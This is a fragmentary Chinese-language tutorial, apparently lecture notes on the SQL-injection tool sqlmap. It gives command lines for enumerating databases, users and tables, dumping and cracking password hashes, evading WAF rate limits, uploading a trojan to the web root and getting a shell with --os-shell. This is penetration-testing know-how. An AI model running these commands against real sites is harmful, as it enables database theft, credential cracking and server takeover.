SQLMAP
SQLMAP介绍
当然也可以过一些waf
sqlmap安装
基本的参数
–is-dba
基本的还是
sqlmap.py -u"测试的网址"
current就是当前的
时间延迟类型
测得是union联合查询类型的
这个是sqlmap跑出来的一个
第一行说的是在id参数下存在的注入
第一个 type是bool盲注
第二个 时间延迟盲注
第三个 union联合查询
这些信息是 mysql的数据库
操作系统是 win2003或者是xp
以及php脚本版本 和mysql的版本
sqlmap.py -u"测试的网址" --is-dba(看数据库连接的到底是什么权限)
(如果access的数据库就没有必要执行这个命令 因为他是一个文件存在的)
这个true代表的是当前的这个网站dba是管理员 这个权限是很大的
sqlmap.py -u"测试的网址" --dbs
看看当前数据库有哪些用户数据库
这些都是数据库
sqlmap.py -u"测试的网址" --current-db
(看下当前我是哪些数据库)
这是我们数据库的名称
sqlmap.py -u"测试的网址" --current-user
(连接的数据库用户名称)
sqlmap.py -u"测试的网址" --users
(查看下除看这个用户,此数据库还有哪些用户)
这些都是 其他的用户
然后
sqlmap.py -u"测试的网址" --passwords
(列一些这些用户的密码)
这就是用户和他的密码
这个复制出来去md5**一下就可以了
不能解出来的话 就要加载字典去**
sqlmap.py -u"测试的网址" --table -D 数据库名
(数据库列表名,指定数据库名列表)
告诉你有13条表
sqlmap.py -u"测试的网址" --table -D 数据库名 --count
(统计下每个表里边有多少行,进行大体的统计下)
一般管理员的表里就1,2条的数据,可以根据这个特征来看
看些表少得,可能就是管理员的表
sqlmap.py -u"测试的网址" --colunmns -T 指定的表名 -D 数据库名
(指定数据库名称指定表名列列名)
这是跑出来的列名
sqlmap.py -u"测试的网址" --dump -C 指定列名 -T 指定的表名 -D 数据库名
(指定数据库名表名列名列里边的数据)
会出现让你加载一个字典
通过你的加密方式把本地的明文加密成密文
这样就把密文跑出来了 密码明文就是admin123
基本参数
sqlmap.py -u"测试的网址" --privileges
(看当前的用户权限)
数据库的所有权限基本都是有的
–schema是列整个系统架构的 --batch就是不提示我了 就相当于系统自动默认的yes等等
–exclude-sysdbs 把系统的数据库不列 就是系统自带的数据库
探测登级
内容就是这样定义的
cookie就是级别是2
测http头要改成3才能测
显示调试信息
sqlmap.py -u"测试的网址" --dbs -v 3
sqlmap.py -u"测试的网址" --tables -D xss -v 3
sqlmap.py -u"测试的网址" --columns -D xss -v 4
(如果想要看响应页面呢)
一些请求包
风险登级
sqlmap.py -u"测试的网址" --level 3 --risk 3
(让测试的语句更全面一些)
获取目标
sqlmap.py -m 报的路径以及包名
(-m就是多个)
这是测试多个
-r就是跑包
处理Google搜索结果
用之前要挂代理
能访问谷歌data
就是把后面的参数提交给前面的网址页面
–param-del
cookie
–referer(判断请求来源),–headers --proxy(代理)
时间控制
原理就是你用工具1s访问了10次 这不可能是人在浏览 它会自动判断这是个cc攻击
所以就会waf拦截 我们要把这个每秒的访问次数调低些,这个waf就不会拦截你了
就可以这样改下
–safe-url,–safe-freq
不常用
-p
–prefix --suffix
帮助闭合
–technique
怎么用呢
u 指联合查询 e指显错注入 flush-session 清除缓存
(指那些方式去测试网站)
–union-cols
sqlmap 与oracle 都是用null 来填充的
–second-order
如果遇到了二阶注入的类型
指定它回显示从哪里开始的
–dump-all,–exclude -sysdbs
–search -C -T -D
主动的直接去搜索表名
结果有两种 一个是模糊匹配 一个是完整匹配
1就是模糊匹配 2就是完整匹配
-udf-inject shared-lib
-s -t
-batch
–flush-session
(清楚缓存)
–output-dir
(保存路径的).
–smart --mobile
–identify-waf ,–check-waf
注册表操作
不建议改,可能会改崩
暴力**表名
暴力**列名
post登录框注入
所搜框注入
伪静态
延迟注入
base6编码
执行sql语句
看下版本
读文件
into outfile 写文件
文件读写
用法
文件上传
就是个上传的方式
把自己的木马文件上传到网站的根目录下
命令执行
记住–os-shell重要
4个路径
依次是默认结构路径
自定义路径
加载目录列表进行**
暴力搜索.
选择的第二个路径 上传文件
导出数据
WAF绕过
配合msf使用